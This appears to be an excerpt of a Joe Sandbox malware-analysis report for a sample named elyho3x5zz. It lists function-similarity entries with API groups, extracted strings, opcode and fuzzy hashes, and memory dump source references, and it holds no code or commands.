      • Opcode ID: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
      • Instruction ID: 61ad3a455f5f4c518938d43579437dcb3ee825b0e87da926f23b58bfea9ab36f
      • Opcode Fuzzy Hash: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
      • Instruction Fuzzy Hash: B0A1F83AA08641A6F724EF25E40627EF760FB84794FD04175EA4E47A98CF3CE505E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
      • String ID: -$:$:$?
      • API String ID: 3440502458-92861585
      • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
      • Instruction ID: bf183e7c3502ff38dd4b4f3d94c2f914a335dc9c53abb2b3e00165e336f88c0f
      • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
      • Instruction Fuzzy Hash: BAE1E33AA08382A6F728EF35A8525B9B791FBC4788FC45175FA4D42A85DF3CD441B720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Time$File$FindLocalSystem$CloseFirst
      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
      • API String ID: 3232708057-3289030164
      • Opcode ID: 99373204d3eee79308f12c972c1776314de6b4721b08e54cea434bd76cde1071
      • Instruction ID: 8a5247ae01eaa180d05bf2d7ced87655fdf271f69001a3e8f2b78669f25097a3
      • Opcode Fuzzy Hash: 99373204d3eee79308f12c972c1776314de6b4721b08e54cea434bd76cde1071
      • Instruction Fuzzy Hash: 90D18D66B18A52A5FB10EB65E4420FEF771FB80794F800172EA4D47AA9DF7CD508E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
      • String ID: *.*
      • API String ID: 1409584000-438819550
      • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
      • Instruction ID: 5865d7a322fb453395f441c21c6726b173e70f8c1ecd7b4677742fae914aa1a3
      • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
      • Instruction Fuzzy Hash: CD41B16960864264FF40AF55E84A2B9E3A4FF84BA4FC441B1ED6D436A4DF3CD40AF720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: SendString
      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
      • API String ID: 890592661-1007645807
      • Opcode ID: 0c4b7ffb51465110a801df2b1a2053930165c7dcbe653a3015cc393272356e2c
      • Instruction ID: 960bbc45c055ef860496160295b8e033f41105597af9632aa4d38de6907ed8c7
      • Opcode Fuzzy Hash: 0c4b7ffb51465110a801df2b1a2053930165c7dcbe653a3015cc393272356e2c
      • Instruction Fuzzy Hash: 8021612BB08992A2F720FB24F8566BAE360BFD5748FC14171E54D43958EE2CD509E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
      • String ID: *.*
      • API String ID: 2640511053-438819550
      • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
      • Instruction ID: 1750c878151fa0173e5ae8fb67053c134855bf089702d9d92c34e9686954a637
      • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
      • Instruction Fuzzy Hash: 9841A159A0CA4364FE50AF11A84A6B9E350BF84BE4FC141B1ED6D47695DF3CD409F720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
      • String ID:
      • API String ID: 2762341140-0
      • Opcode ID: 47d9648184b6ac8105b91a1ce0b108649052850a5ca3e0ca03a513eeb084477d
      • Instruction ID: 23f008bed817cd9248439b6577e6115d112ae9f38f19e42896c122cc8e8ae5ca
      • Opcode Fuzzy Hash: 47d9648184b6ac8105b91a1ce0b108649052850a5ca3e0ca03a513eeb084477d
      • Instruction Fuzzy Hash: 01C1786BB04B8596EB10EF26E8811ADB7B0FB88B94F854076DE4E47B65CF38D144E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
      • String ID:
      • API String ID: 1255039815-0
      • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
      • Instruction ID: d02c86f0f6d65764d20faf6a44c9361752addb4082208421a768be2d21fccba2
      • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
      • Instruction Fuzzy Hash: 0461DF2AF04651AAFB00EF61C84A5BC77B4FB85B88B844075DE0A53B94DF39D809F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: State$Async$Keyboard
      • String ID:
      • API String ID: 541375521-0
      • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
      • Instruction ID: bd96fd20a8c869ad8f7c33a2bd0832397c0fdaad0237e836540fb4eb4bd252d9
      • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
      • Instruction Fuzzy Hash: 3941C829E0CAD179FB71BB60E402379AB90EF96B44F8840B9D799031C1CF1DA894B771
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Error$Mode$DiskFreeLastSpace
      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
      • API String ID: 4194297153-14809454
      • Opcode ID: e1a572a878ac439d4873769eb739623b4178df3d2e0a7b9e1def14c61bfa5fa1
      • Instruction ID: f86573ad74bbf30bb4e4c888814b572718200058483ab83c9213583787abc732
      • Opcode Fuzzy Hash: e1a572a878ac439d4873769eb739623b4178df3d2e0a7b9e1def14c61bfa5fa1
      • Instruction Fuzzy Hash: 25415F7BA08A42A9FB14EB25D4821BCB771FBC8B94F844572DA0D43B55DF38D585E320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
      • String ID:
      • API String ID: 1737998785-0
      • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
      • Instruction ID: a0b77d81cab5620a9bf511bab6a610fb66ec1133e65c12481173e057b80396b7
      • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
      • Instruction Fuzzy Hash: E341B17AA0964296FB00AF15E48633CB760FF94B85F848474EA0E477A2CF7CE051B724
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
      • String ID: \*.*
      • API String ID: 4047182710-1173974218
      • Opcode ID: 63d5e11d665e15a438a0c10d74a1b99b801933d09aa92db42f818117b57713fc
      • Instruction ID: 91d1f42b3d94de3a19537cf988a97adbb004bda8c3d9529fb8657f1b37358ecd
      • Opcode Fuzzy Hash: 63d5e11d665e15a438a0c10d74a1b99b801933d09aa92db42f818117b57713fc
      • Instruction Fuzzy Hash: F981432AA08652A5FB50FB64E4421FDBB70EB84794FC00172FA4E46AA9DF3CD545E720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorLast$closesocket$bindlistensocket
      • String ID:
      • API String ID: 540024437-0
      • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
      • Instruction ID: 8fa769016f252223036bc154d3ed2b4932c05851f662b72c73b14e537be4633b
      • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
      • Instruction Fuzzy Hash: 4941D26AA0864296FB10FF16A44227CF760FF94BA0F884570EA5E47792CF7CD541B714
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: NULL Pointer assignment$Not an Object type
      • API String ID: 0-572801152
      • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
      • Instruction ID: 551f4b6aadb9c07cd69c361bae0735cf197e58e5d686c8373514e7a9154268db
      • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
      • Instruction Fuzzy Hash: 72E1D33AA09B82A6FB10DF25E4412ADB7A0FBC4798F804136DE4D47BA4DF78E545E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
      • String ID: \*.*
      • API String ID: 2649000838-1173974218
      • Opcode ID: 9a9742f6c1f2db144535d51f8d9156eedd2c1375842904f3187248af9e6946d9
      • Instruction ID: 885acb7206fef01bbfa525d17c9842b6cbc6c3df5b8d116d675ab2d64eaab073
      • Opcode Fuzzy Hash: 9a9742f6c1f2db144535d51f8d9156eedd2c1375842904f3187248af9e6946d9
      • Instruction Fuzzy Hash: E241812AA28A42A6FB50EB20E4421BDB360FFC4B90FD011B2FA5E47695DF7CD505E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
      • String ID:
      • API String ID: 1239891234-0
      • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
      • Instruction ID: 81055516a6ebf5079923b46dcc72359e340af854f3018572570718aec558e0f3
      • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
      • Instruction Fuzzy Hash: 0431733A618B819AEB60DF25E8412AEB3A4FBC8754F900235EA9D43B59DF3CC545DB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
      • String ID:
      • API String ID: 1413079979-0
      • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
      • Instruction ID: 34632fe6cccf533423357c44af7f84e08f96f4284d26e3da01aba0b075555be4
      • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
      • Instruction Fuzzy Hash: BB318D36608B859AE7609F02E8817AAB3A4FBC9B90F844176DE8D43B54DF3DD445EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
      • String ID: *.*
      • API String ID: 1927845040-438819550
      • Opcode ID: 60066e7ae72725fd240c8aaa1ccf88b42092936b6c2304e3e863c1c22e659da5
      • Instruction ID: 1002ceecbadc3f36b732b346bd7c2b8ee35b1cdf89a186e286867179fc2b82ad
      • Opcode Fuzzy Hash: 60066e7ae72725fd240c8aaa1ccf88b42092936b6c2304e3e863c1c22e659da5
      • Instruction Fuzzy Hash: 6C51A12A608A82A5FB10EB15E8462BDF3B0FB85794F9101B2DE4D03799EF3CD945E710
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
      • API String ID: 0-2187161917
      • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
      • Instruction ID: 7f9960a08468fd87ecca1f9188521777c35cde5bbd1d9663b8503ec688d5c427
      • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
      • Instruction Fuzzy Hash: C8B2057BA0869196FB209F24A8062BDB7B1FB84788F904576DE5D57B84DF3CE840E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateFullInitializeInstanceNamePathUninitialize
      • String ID: .lnk
      • API String ID: 3769357847-24824748
      • Opcode ID: eda95dcdb1a60db1e74d818a96950abed1f83fa0258330edcd21d03ba9bb01b1
      • Instruction ID: b1615f487441079fdd071dfcfdaad6f23e272df39e79225dc49579ec2dec2699
      • Opcode Fuzzy Hash: eda95dcdb1a60db1e74d818a96950abed1f83fa0258330edcd21d03ba9bb01b1
      • Instruction Fuzzy Hash: F9D15A7AB04A46A5FB10EF66D0912ADB7B0FB88B88B884072DE4D47B55DF3DD845E310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _handle_error
      • String ID: !$VUUU$fmod
      • API String ID: 1757819995-2579133210
      • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
      • Instruction ID: 06f3076a5eb792179c0ab12058076176094720ad61278ff286a23b0397a50dc6
      • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
      • Instruction Fuzzy Hash: AFB1F625E1CFC445E6A7DA3450123B6F259AFEB390F50C332E95E36AA4DF2C9582A701
      APIs
      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73A212D60
        • Part of subcall function 00007FF73A20B184: GetCurrentProcess.KERNEL32(00007FF73A20B21D), ref: 00007FF73A20B1B1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
